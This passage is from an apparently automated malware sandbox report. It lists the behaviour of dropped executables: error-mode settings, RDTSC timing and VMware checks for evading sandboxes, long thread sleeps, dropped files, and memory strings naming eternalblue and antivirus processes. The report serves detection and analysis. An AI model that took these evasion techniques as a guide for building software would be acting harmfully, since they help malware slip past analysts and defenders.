            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: , S.BASE()=, S.NPAGES=, SETTINGS:.WITHCANCEL/API/REPORT/APP/VC.EXE/DEV/STDERR/DEV/STDOUT/INDEX.HTML30517578125: FRAME.SP=; MAX-AGE=0<INVALID OPBAD GATEWAYBAD REQUESTCLASSHESIODCLOSEHANDLECLOSEWINDOWCOGETOBJECTCOOKIE.PATHCREATEFILEWDELETEFILEWDISPLAYNAMEE-X.NOT.FYIENABLE_PUSHEND_HEADERSEARLY HINTSENUMWINDOWSEXITPROCESSFREELIBRARYGOTRACEBACKGETFILESIZEGETFILETYPEGETMESSAGEWHTTPS_PROXYISO 8859-10ISO 8859-13ISO 8859-14ISO 8859-15ISO 8859-16ISO-8859-6EISO-8859-6IISO-8859-8EISO-8859-8IIDEOGRAPHICIN-REPLY-TOINSTCAPTUREINSTRUNEANYINSTALLDATEMACHINEGUIDMEDEFAIDRINMESSAGEBOXWMOVEFILEEXWNETSHAREADDNETSHAREDELNEW_TAI_LUEOLD_PERSIANOLD_SOGDIANOPENPROCESSPRIVATE KEYPAU_CIN_HAUREGCLOSEKEYRETURN-PATHSYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDERWINDOWS 874[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONATTACK_TYPEBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGETPEERNAMEGETSOCKNAMEHOST IS NILHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTNOTIFY-HOSTORANNIS.COMRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECUR32.DLLSHELL32.DLLSHORT WRITETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUPDATE-DATAUPLOAD-FILEUSERENV.DLLVERSION=179VM DETECTEDVMUSRVC.EXEWININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeRDTSC instruction interceptor: First address: 0000000000401D11 second address: 0000000000401D11 instructions: 0x00000000 rdtsc 0x00000002 movzx edx, al 0x00000005 cmp edx, 00000000h 0x00000008 jbe 00007F4158C5E200h 0x0000000a cmp edx, 10h 0x0000000d jnc 00007F4158C5E1FBh 0x0000000f cmp edx, 0Fh 0x00000012 jbe 00007F4158C5E200h 0x00000014 cmp edx, 20h 0x00000017 jnc 00007F4158C5E1FBh 0x00000019 cmp edx, 1Fh 0x0000001c jbe 00007F4158C5E200h 0x0000001e cmp edx, 30h 0x00000021 jnc 00007F4158C5E1FBh 0x00000023 cmp edx, 2Fh 0x00000026 jbe 00007F4158C5E200h 0x00000028 cmp edx, 40h 0x0000002b jnc 00007F4158C5E1FBh 0x0000002d cmp edx, 3Fh 0x00000030 jbe 00007F4158C5E200h 0x00000032 cmp edx, 50h 0x00000035 jnc 00007F4158C5E1FBh 0x00000037 cmp edx, 4Fh 0x0000003a jbe 00007F4158C5E200h 0x0000003c cmp edx, 60h 0x0000003f jnc 00007F4158C5E1FBh 0x00000041 cmp edx, 5Fh 0x00000044 jbe 00007F4158C5E200h 0x00000046 cmp edx, 70h 0x00000049 jnc 00007F4158C5E1FBh 0x0000004b mov al, 37h 0x0000004d mov bl, 6Fh 0x0000004f jmp 00007F4158C5E2A9h 0x00000054 mov byte ptr [esi], bl 0x00000056 inc esi 0x00000057 stosb 0x00000058 dec ecx 0x00000059 jne 00007F4158C5E0ADh 0x0000005f rdtsc
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00401B70 rdtsc 13_2_00401B70
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,LoadLibraryA,GetProcAddress,GetAdaptersInfo,_Deallocate,17_2_010AE466
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeThread delayed: delay time: 1800000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeThread delayed: delay time: 1800000
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KTTI2.tmp\installer.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeDropped PE file which has not been started: C:\Program Files\89C8W4UQTF\uninstaller.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\NoikfEU1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeRegistry key enumerated: More than 172 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe TID: 5932Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe TID: 6384Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 5596Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 5980Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 4824Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 6820Thread sleep time: -3600000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 4780Thread sleep count: 308 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 4780Thread sleep time: -308000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 4112Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe TID: 2240Thread sleep time: -1800000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe TID: 6816Thread sleep count: 33 > 30
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe TID: 5968Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe TID: 5784Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe TID: 3984Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe TID: 5048Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe TID: 6944Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe TID: 6944Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe TID: 5564Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeFile opened: PhysicalDrive0
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010A5969 FindFirstFileW,FindNextFileW,FindClose,17_2_010A5969
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01039290 FindFirstFileExW,17_2_01039290
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_0040AEF4 FindFirstFileW,FindClose,18_2_0040AEF4
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,18_2_0040A928
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01046F37 GetSystemInfo,17_2_01046F37
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: entersyscalleternalblue:event-existsexit status found av: %sgcpacertraceget_app_namegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmutex-existsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangepointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffertransmitfileulrichard.chunexpected )unknown portunknown typevmtoolsd.exewatchdog.exewinlogon.exewirep: p->m=wtsapi32.dll != sweepgen MB released
            Source: multitimer.exe, 00000002.00000002.669864680.000000001B448000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmpBinary or memory string: *)HKEY_CLASSES_ROOT\Software\VMware, Inc.\.
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmpBinary or memory string: *)HKEY_CURRENT_USER\Software\VMware, Inc.\.
